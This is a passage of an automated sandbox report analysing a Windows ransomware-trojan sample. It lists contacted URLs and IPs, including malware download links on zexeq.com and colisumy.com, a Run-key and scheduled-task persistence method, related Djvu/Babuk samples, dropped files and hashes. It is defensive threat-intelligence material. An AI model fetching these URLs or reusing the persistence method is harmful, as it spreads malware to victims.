baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269675971.0000000001389000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000003.1714776358.00000000009E4000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000002.2950549352.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000004.00000003.1786377999.000000000140D000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000004.00000002.1787330867.000000000140F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000005.00000002.1869083710.0000000001118000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.2ip.ua/d	baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000000.00000002.1692451058.00000000008E3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.jsonU	baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000005.00000002.1869083710.00000000010D8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.jsonOC	baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000004.00000002.1787330867.0000000001446000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000004.00000003.1786377999.0000000001446000.00000004.00000020.00020000.00000000.sdmp	false		high
http://colisumy.com/dl/build2.exe	baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019555788.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269675971.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2330904102.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316336423.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1992501087.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1992501087.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316336423.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280417518.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280417518.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2330904102.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269675971.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019555788.00000000013CD000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
http://zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637V	baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000002.2950549352.000000000097E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://api.2ip.ua/P	baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000005.00000002.1869083710.0000000001118000.00000004.00000020.00020000.00000000.sdmp	false		high
https://we.tl/t-tnzomMj6KnppRlYjmra845ChcK9KfcC6oyEQ3WR0jTu9TqM6BjS2eChMx7MCbe1L9N52XQ==	baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2315130907.0000000003C4F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2309699551.0000000003C4F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2305085641.0000000003C4B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2327644820.0000000003C4F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2270669928.0000000003C4B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2332149478.0000000003C50000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2321099831.0000000003C4F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.2ip.ua/geo.jsong	baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000004.00000002.1787330867.00000000013A8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637i	baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000002.2950549352.000000000097E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://api.2ip.ua/=	baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000003.1714776358.00000000009E4000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000002.2950549352.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://zexeq.com/raud/get.phpep	baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269675971.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1992501087.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316336423.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280417518.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2330904102.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019555788.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000002.2950549352.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://api.2ip.ua/geo.json:	baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000005.00000002.1869083710.00000000010D8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.youtube.com/	baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1935388771.0000000004120000.00000004.00001000.00020000.00000000.sdmp	false		high
http://zexeq.com/files/1/build3.exerun8	baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019555788.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2330904102.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316336423.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1992501087.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280417518.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269675971.00000000013BD000.00000004.00000020.00020000.00000000.sdmp	false	17%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://api.2ip.ua/geo.jsonM	baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000003.1714776358.00000000009E4000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.wikipedia.com/	baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1935312916.0000000004120000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.2ip.ua/geo.jsonO	baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000003.1714776358.00000000009E4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://we.tl/t-tnzomMj6HU	baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2332095070.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2315130907.0000000003C4F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2309699551.0000000003C4F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2305085641.0000000003C4B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2327644820.0000000003C4F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2270669928.0000000003C4B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2332149478.0000000003C50000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2321099831.0000000003C4F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000002.2950549352.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000002.2950549352.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000002.2950549352.0000000000A3B000.00000004.00000020.00020000.00000000.sdmp	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.live.com/	baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1935045851.0000000004120000.00000004.00001000.00020000.00000000.sdmp	false		high
https://api.2ip.ua/:	baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000000.00000002.1692451058.00000000008E3000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.google.com/	baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1934984061.0000000004120000.00000004.00001000.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
199.59.242.150	zexeq.com	United States		395082	BODIS-NJUS	true
104.21.65.24	api.2ip.ua	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	39.0.0 Ruby
Analysis ID:	1381448
Start date and time:	2024-01-26 01:35:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 13s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
Detection:	MAL
Classification:	mal100.rans.troj.evad.winEXE@9/1154@3/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 111 Number of non-executed functions: 216
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadFile calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Report size getting too big, too many NtWriteFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
00:35:57	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe" --AutoStart
00:35:58	Task Scheduler	Run new task: Time Trigger Task path: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe s>--Task
00:36:05	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe" --AutoStart
01:36:19	API Interceptor	1x Sleep call for process: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
199.59.242.150	6279e6237524c32988e7128c27a6a44c301ac1d1531ab3abf317b064eba76acd_payload.exe	Get hash	malicious	SmokeLoader	Browse	potunulit.org/
	Ymdtavpqygjrzq_PI.exe	Get hash	malicious	FormBook, DBatLoader	Browse	www.agritamaperkasaindonesia.com/kmge/
	Ibyz5QzGiV.exe	Get hash	malicious	Lokibot	Browse	steevya.com/admin/ba/five/fre.php
	Factura proforma adjunta.exe	Get hash	malicious	FormBook	Browse	www.yakin-hm.com/nt8e/?Yxo=MZHud9kMxet5T2L8YDs3rsYyxIdNjupHhQJnT0keEq5jiDIySj744ig25LCroVWDpjT4&jR-Xjh=5jHPk
	K.exe	Get hash	malicious	FormBook	Browse	www.cetiya-veluvana.com/t75f/?u0=Tl4nDa252FMQpJVNY72qWpuVEFp510CZfqovHxMA7fYk3klFuQo16toWEHSGxtFJGw2O&m4=Wbfx
	0001.exe	Get hash	malicious	FormBook	Browse	www.gardzet6.site/rht6/?1bbh=2duHZ8O0&w84PKtm=PA2P7p+1xflJkDULrkdSh717KSKlfthlFefPs9yUelGMDGkwpVE1Edn1X8mpjUbZRLAM
	USsJ0oRIYr.docx	Get hash	malicious	Unknown	Browse	updatingnewofficefilefromcloud.mangospot.net/win/document.doc
104.21.65.24	toolspub1.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, RedLine, SmokeLoader	Browse
	toolspub1(1).exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, RedLine, SmokeLoader	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Babuk, Djvu, LummaC Stealer, PureLog Stealer, RedLine	Browse
	toolspub1.exe	Get hash	malicious	LummaC, Amadey, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer	Browse
	nMQ8ZsQ2j1.exe	Get hash	malicious	Babuk, Djvu	Browse
	toolspub1.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, RedLine	Browse
	file.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, RedLine	Browse
	DiFp5gEj5Z.exe	Get hash	malicious	LummaC, Babuk, Djvu, LummaC Stealer, RedLine, RisePro Stealer, SmokeLoader	Browse
	toolspub2.exe	Get hash	malicious	LummaC, Babuk, Djvu, LummaC Stealer, RedLine, SmokeLoader	Browse
	file.exe	Get hash	malicious	Babuk, Djvu	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
zexeq.com	3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe	Get hash	malicious	Babuk, Djvu	Browse	175.119.10.231
	9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe	Get hash	malicious	Babuk, Djvu, Vidar	Browse	175.120.254.9
	UpS8Qm873s.exe	Get hash	malicious	Babuk, Djvu, Vidar	Browse	175.120.254.9
	g0Zq7nJjus.exe	Get hash	malicious	Babuk, Djvu, Vidar	Browse	196.188.169.138
	E0tabE4K4r.exe	Get hash	malicious	Babuk, Djvu, Vidar	Browse	109.175.29.39
	sbvN2ih5AU.exe	Get hash	malicious	Babuk, Djvu, Vidar	Browse	175.120.254.9
	kOVwcHSfrR.exe	Get hash	malicious	Babuk, Djvu, Vidar	Browse	186.182.55.44
	file.exe	Get hash	malicious	Babuk, Djvu	Browse	180.94.156.61
	file.exe	Get hash	malicious	Babuk, Djvu	Browse	211.119.84.111
	buildz.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	186.13.17.220
api.2ip.ua	toolspub1.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, RedLine, SmokeLoader	Browse	104.21.65.24
	file.exe	Get hash	malicious	Glupteba, LummaC Stealer, RedLine, SmokeLoader, Stealc, Vidar	Browse	172.67.139.220
	toolspub1(1).exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, RedLine, SmokeLoader	Browse	104.21.65.24
	file.exe	Get hash	malicious	LummaC, Amadey, Babuk, Djvu, LummaC Stealer, PureLog Stealer, RedLine	Browse	104.21.65.24
	file.exe	Get hash	malicious	Clipboard Hijacker, Djvu, Fabookie, Glupteba, LummaC Stealer, RedLine, SmokeLoader	Browse	172.67.139.220
	file.exe	Get hash	malicious	Babuk, Djvu	Browse	172.67.139.220
	toolspub1.exe	Get hash	malicious	LummaC, Amadey, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer	Browse	104.21.65.24
	BbTm8TrVqb.exe	Get hash	malicious	LummaC, AsyncRAT, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer	Browse	172.67.139.220
	buildz.exe	Get hash	malicious	Babuk, Djvu, Vidar	Browse	172.67.139.220
	toolspub1.exe	Get hash	malicious	LummaC, Babuk, Djvu, LummaC Stealer, PureLog Stealer, RedLine, RisePro Stealer	Browse	172.67.139.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://massimotamburrino.com/dhI/	Get hash	malicious	Unknown	Browse	104.18.10.207
	https://gwrepermits.com/into/wait/before/logins/info.php	Get hash	malicious	Unknown	Browse	66.235.200.112
	https://goldenocalarealestate-af3.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://jadenlewis.autos/sauce/more/?col=two	Get hash	malicious	TechSupportScam	Browse	104.18.11.207
	https://orange-wind-1189.on.fleek.co/	Get hash	malicious	Unknown	Browse	104.18.7.145
	https://jadenlewis.autos/sauce/more/?col=one	Get hash	malicious	TechSupportScam	Browse	104.18.11.207
	https://jayfrederick.autos/sauce/more/?col=three	Get hash	malicious	TechSupportScam	Browse	104.18.10.207
	w6UnQD7ZYf.exe	Get hash	malicious	Amadey, Fabookie, LummaC Stealer, RedLine, RisePro Stealer, Stealc	Browse	172.64.41.3
	https://oyster-app-wfmt9.ondigitalocean.app/w5/?tel=1-833-321-0248	Get hash	malicious	TechSupportScam	Browse	162.159.140.98
	https://www.socialvolunteerofbangladesh.org/0190280.html	Get hash	malicious	HTMLPhisher	Browse	104.17.64.14
BODIS-NJUS	IHAVERSI.exe	Get hash	malicious	Upatre	Browse	199.59.243.225
	6279e6237524c32988e7128c27a6a44c301ac1d1531ab3abf317b064eba76acd_payload.exe	Get hash	malicious	SmokeLoader	Browse	199.59.242.150
	EpsilonApp.exe	Get hash	malicious	Unknown	Browse	199.59.243.225
	fattura proforma pdf.exe	Get hash	malicious	DBatLoader, FormBook	Browse	199.59.243.225
	SecuriteInfo.com.FileRepMalware.26858.3313.exe	Get hash	malicious	Unknown	Browse	199.59.243.225
	http://www.panda-me.com/	Get hash	malicious	Unknown	Browse	199.59.243.225
	download.exe	Get hash	malicious	Unknown	Browse	199.59.243.225
	YlipkRys84.exe	Get hash	malicious	Pony	Browse	199.59.243.225
	https://r20.rs6.net/tn.jsp?f=001fUVnri7kdbhTEhvQvFy8TVgMvESvHkIhvwllitpETS-nMR8COXGjJniiAvGI1HHEWJ5sanQY1hsDvlIkURslv8jABAg4m4fr0aWCQau5o8SYqp1aeAiDy1pua6PVSEmJ43yTewigp7YBgCfNtT0yW-zecCJr1aKn_lMHdnWElvA=&c=dHfSeElN2sdJGI74sOPsQEbzTt3B64v-4p3u7usufnr2TiVbcpQSnA==&ch=cJfmQfhZ-1gcpjRQuM7rN7u4qjvzC34qPKHNuSclsQx7PogUFIwFoA==&__=YWJkb3UuemlyYXRAYXNzbmF0LnFjLmNh	Get hash	malicious	Unknown	Browse	199.59.243.225
	LockBit_Ransomware.html	Get hash	malicious	Unknown	Browse	199.59.243.225

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	file.exe	Get hash	malicious	Unknown	Browse	104.21.65.24
	ooo.dll.exe	Get hash	malicious	Qbot	Browse	104.21.65.24
	file.exe	Get hash	malicious	Unknown	Browse	104.21.65.24
	B4pdM0gRs3.exe	Get hash	malicious	GuLoader, Remcos	Browse	104.21.65.24
	readme.zip	Get hash	malicious	CobaltStrike	Browse	104.21.65.24
	CCleaner.exe	Get hash	malicious	RMSRemoteAdmin, Remote Utilities	Browse	104.21.65.24
	CCleaner.exe	Get hash	malicious	RMSRemoteAdmin, Remote Utilities	Browse	104.21.65.24
	file.exe	Get hash	malicious	Vidar	Browse	104.21.65.24
	file.exe	Get hash	malicious	Vidar	Browse	104.21.65.24
	screen.exe	Get hash	malicious	Unknown	Browse	104.21.65.24

Process:	C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
File Type:	data
Category:	dropped
Size (bytes):	626
Entropy (8bit):	7.618562704509653
Encrypted:	false
SSDEEP:	12:koN01yylJE75knkXbqi0FBWeloy5f0Kpz9ZYJie2FwAgJc3cii9a:LN0QaAkY2i0FBWeuuB7OiqAx3bD
MD5:	E4B740B2C209F87F541B594C4AA68BD2
SHA1:	B0F8BEB1336895416BBDEF51802305B865F743D8
SHA-256:	4C48EF2069DD28AD05F252D4E3095339F38E3DD349DE72C40F3AD35DBE0ADE77
SHA-512:	FCD353E6089276DC830021506B7BAFB1BD2D729E74A45012B7F105D53C9E02E11E0A4FB7FDEDBFAE13F5DFFDF33F27B677A1061CF7AD82C064572D1C7A5BE5C7
Malicious:	false
Reputation:	low
Preview:	2023/...).F...:...N.Sp.A.\|\.J..?n...Y.\|.B.......a...\|?..].....t..Hu\|....Q.u..Iru...CKH..r..)e...C.+-....n.P.\|J.x.....sst......A..:.....c..s.E.HE..h....HYf..K.c..K...* .G.....!.a.5[B......\|.e.l.....H....%.}.U...}..L..T.)..2.Y..p.O...<...T.(ta.....@..X.G,...c.....u.d...J....#..\|.H..J.f...M..lO......).,......R\....s0...U7.&..I.p.l.G.'{.)G..In.\|.....:..X.}.O......K...Z+u.@.>g,..p.,....;^..`......^....V..........?....C.....w.O..7..f.5..../..@...6.`....=.../....N.[u....y.5.9._.N...?=Y..mQLjZ.p.'w........s.........BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

Process:	C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
File Type:	data
Category:	dropped
Size (bytes):	617
Entropy (8bit):	7.616070686762447
Encrypted:	false
SSDEEP:	12:kIU/2NFaPAPwYT57nDmRCtkwyQOtPzUva/yupdA/T41Qr3h4lgJc3cii9a:Q2NQgwYTZhtEQOtPz3+SQr3h4lx3bD
MD5:	248C9EC5ACCBBF912E9D976E93AAB527
SHA1:	4883C42262A68474F65762964AC4CDC4BD0D24C2
SHA-256:	6489AFE8091495A985197A4EF8BE8C660BDC8EB7BED8A89868E4A345E55F701B
SHA-512:	CB9CCCB4C6BB58310D33981E76B088E41408026CD7FB48B0756950704D548FBE0F79640A87CA9F48A53854D14249C4BD751685F617C7545B57D36D6EB5CC03C0
Malicious:	false
Preview:	2023/S.;....3.,u......$u.".E.o...F!..V.Op8.4...E..Xg.....f..k.......x[.j.9..)...@..3\|J'.=hU4.!.UT.sAd.....i.9&...7C ..X.r.4iXA.i78l.B.e4...>.)j.b=.....v..,..G..].....(.......N......>...?<.X.W...5..Y..my..]k..d.~...)#Z."B8Q.g.$.].X...<.......Y.k7.HIbC.%..N......hWc...+.....-.C.>.Jl...S!.HfD.xs..3z...3..[...DC....Wa......Kd.c.S....E..!..~l........t#X's5u..(..4.gM..w.....M.x\.[.a.Vg...4.R..^.. ...M...>...@.].xrI.7.....L..E..x4.H../............m.BSF......A.".3-U.....G.n....:h&}.4....z`w.K....B....]\......c..n..j.hBUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.657266362346896
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
File size:	1'150'976 bytes
MD5:	5cacd6f1b5cec25f3f0b0b3c4d5807d3
SHA1:	41b8851bc57462502b0113ee1f2579dff5d94f4f
SHA256:	c73cb93ad9ad6d003b505ce2b960d75467ad612786e0559c74dca18426fb9400
SHA512:	7d46037825e5f34f02105c45ee05e03e4c2d7e73889a43c4e47704e27e563cae63f5d0dffb01a2d628ad0b3962e31cebf44dbed5892b6e1a995c45ee2c0714b4
SSDEEP:	24576:ZBUIKn/vwOXGUXAjCymYZiVtElVIBT2roqnTSSxWeT/dRPOO82WQHUq7:F0dwAYZt6C31WeTVRPOh27Uq7
TLSH:	2435AE02BB819171E5D341BA0DFE977E883AA9A0933A95C3D7E91C568E306D0673F3C5
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......(O..l...l...l.....7.f.......+/..*...h.....9.m...../.m...a\|..Q...a\|7.s...a\|........&.n.....8.n.....#.M...l...........d...a\|3.m..

Entrypoint:	0x424141
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
